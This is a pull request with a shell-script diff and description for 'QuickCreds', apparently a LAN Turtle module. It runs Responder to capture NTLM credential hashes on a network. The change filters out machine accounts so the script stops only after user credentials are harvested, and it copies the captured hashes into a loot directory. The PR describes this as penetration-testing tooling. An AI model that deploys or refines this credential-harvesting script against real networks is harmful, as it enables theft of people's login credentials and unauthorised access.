### PR TITLE
Modified Script to fix a couple of issues

### DIFF
--- a/modules/QuickCreds
+++ b/modules/QuickCreds
@@ -114,7 +114,8 @@ echo "Starting attack..." >> /root/loot/responder.log
 cd /root/loot
 dircount=$(ls -lad /root/loot/* | wc -l)
 mkdir /root/loot/$((dircount))
-rm /etc/turtle/Responder/logs
+# Delete all current Responder logs
+rm /etc/turtle/Responder/logs/*
 ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
 
 # Stop dnsmasq
@@ -125,11 +126,14 @@ screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I 
 
 # Blink upon hash capture
 while true; do
-if [ -e /etc/turtle/Responder/logs/*NTLM* ];
+# Grep for user creds and do not match on machine creds, machine usernames end in $
+if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
   then 
     if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
     then
       echo "Creds saved!" >> /root/loot/responder.log
+#copy all responder logs to loot directory      
+      cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
       finished
     fi
 fi


### PR DESCRIPTION
Made the following changes:
 Modified check script to only stop when User credentials were harvested.  Machine credentials are often captured by Responder and are next to useless on a penetration test.  Machine credentials have a $ as the last digit of the username.  I also purge the Responder logs correctly at the start of the script and then make a copy of the logs directory to the current loot numbered directory before the cleanup.
